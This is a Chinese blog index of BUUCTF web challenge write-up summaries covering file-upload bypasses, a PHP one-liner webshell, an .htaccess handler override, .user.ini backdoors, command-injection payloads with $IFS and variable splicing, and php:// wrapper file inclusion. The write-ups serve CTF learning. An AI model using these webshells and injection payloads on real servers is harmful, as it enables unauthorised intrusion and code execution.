随笔分类 - CTFBUU_WEB_解题思路
记录你、我与CTFBUU~
摘要:知识点 文件类型绕过👇 Content-Type: image/jpeg apache环境下上传.hatcess 首先上传一个.htaccess内容如下的文件 <FilesMatch "shell2.jpg"> SetHandler application/x-httpd-php </FilesM
阅读全文
摘要:题目 打开后查看源代码👇 I put something in F12 for you <?php include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['i
阅读全文
摘要:前言 内容来自互联网,若有侵权,联系我。 .htaccess简介 .htaccess文件(分布式配置文件),提供了针对目录改变配置的方法, 就是在一个特定的文件目录中放置一个包含多个指令的文件,以作用于此 目 录及其子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache 的allowO
阅读全文
摘要:[SUCTF 2019]CheckIn 目录 [SUCTF 2019]CheckIn 题目:buu平台上的,题目链接 解题过程: exif_imagetype 说明 一些关于user.ini的知识 解题操作: 一:上传user.ini 二:上传lx.jpg 三:菜刀连接(或蚁剑) 四:另一种解法 相
阅读全文
摘要:步骤👇 php别名绕过 随意上传一个带一句话木马的lx.jpg文件,抓包,修改后缀名。 后缀名一直尝试到phtml后上传成功 打开浏览器粘贴后的到空白页,输入phpinfo进行验证是否成功 使用蚁剑连接添加数据 添加成功后打击进去后找到flag文本就可以在根目录下得到flag了
阅读全文
摘要:步骤👇 打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php @eval($_POST[x]); ?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,p
阅读全文
摘要:知识点: WEB-INF/web.xml泄露 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet cl
阅读全文
摘要:知识点: 1:data://协议 2:php://协议 php://filter用于读取源码 php://input用于执行php代码 注:php伪协议参考链接:https://www.cnblogs.com/SpouseLJ/articles/13225592.html 3:反序列化 解题思路:
阅读全文
摘要:知识点: 类似题型:https://www.cnblogs.com/SpouseLJ/p/13223953.html 命令知识点:https://www.cnblogs.com/SpouseLJ/p/13223967.html 命令执行的方法大抵是加上管道符或者分号 解题思路: 本题很简单什么都没有
阅读全文
摘要:知识点: 本题主要考查了利用php://filter伪协议进行文件包含 解题思路: 进入题目根据Tip进入正题,可以看到URL中存在文件包含(题目名也很直接) 首先考虑 "php://input"伪协议 + POST发送PHP代码 的经典套路,但是发现题目过滤了php://input 重新考虑之后使
阅读全文
摘要:知识点: 命令执行变量拼接 /?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 拼接绕过↓ 1 #执行ls命令: 2 a=l;b=s;$a$b 3 #cat flag文件内容: 4 a=c;b=at;c=f;d=lag;$a$b ${c}${d} 5 #cat test文件内
阅读全文
摘要:知识点: 题目复现链接:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 利用.user.ini上传\隐藏后门 参考链接:user.ini文件构成的PHP后门 条件: 1、服务器脚本语言为PHP 2、服务器使用CGI/FastCGI模式 3、上传目录
阅读全文
摘要:知识点: ①:中国菜刀 ②一句话木马 步骤: 打开靶机看到页面有一句话木马,在看一下题目Knife(刀)猜测本题应该是用中国菜刀链接链接查看文件夹里的flag ②输入链接输入密码进行连接添加 ③添加成功后查看flag文件夹 ④点击flag文件夹的到flag
阅读全文
摘要:知识点: PHP序列化与反序列化,最下方有几个扩展可以看一下 他说备份了,就肯定扫目录,把源文件备份扫出来 步骤: dirsearch扫目录扫到www.zip压缩包 然后解压发现是,序列化。 具体特征如下: index.php包含如下代码:接收参数,进行序列化 <?php include 'clas
阅读全文
摘要:知识点: 前端中背景可以覆盖内容,页面源代码可以查看完整的html 在php文件中可以写入html代码,html可在前端展示出来,php代码主要是处理数据,通常不会展示。 文件包含漏洞,PHP伪协议获取文件 php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体
阅读全文
摘要:发现: 看一下页面源码,发现了提示WAF: calc.php?num=encodeURIComponent($("#content").val()) $("#content").val() 的意思: 获取id为content的HTML标签元素的值,是JQuery。 $("#content")相当于d
阅读全文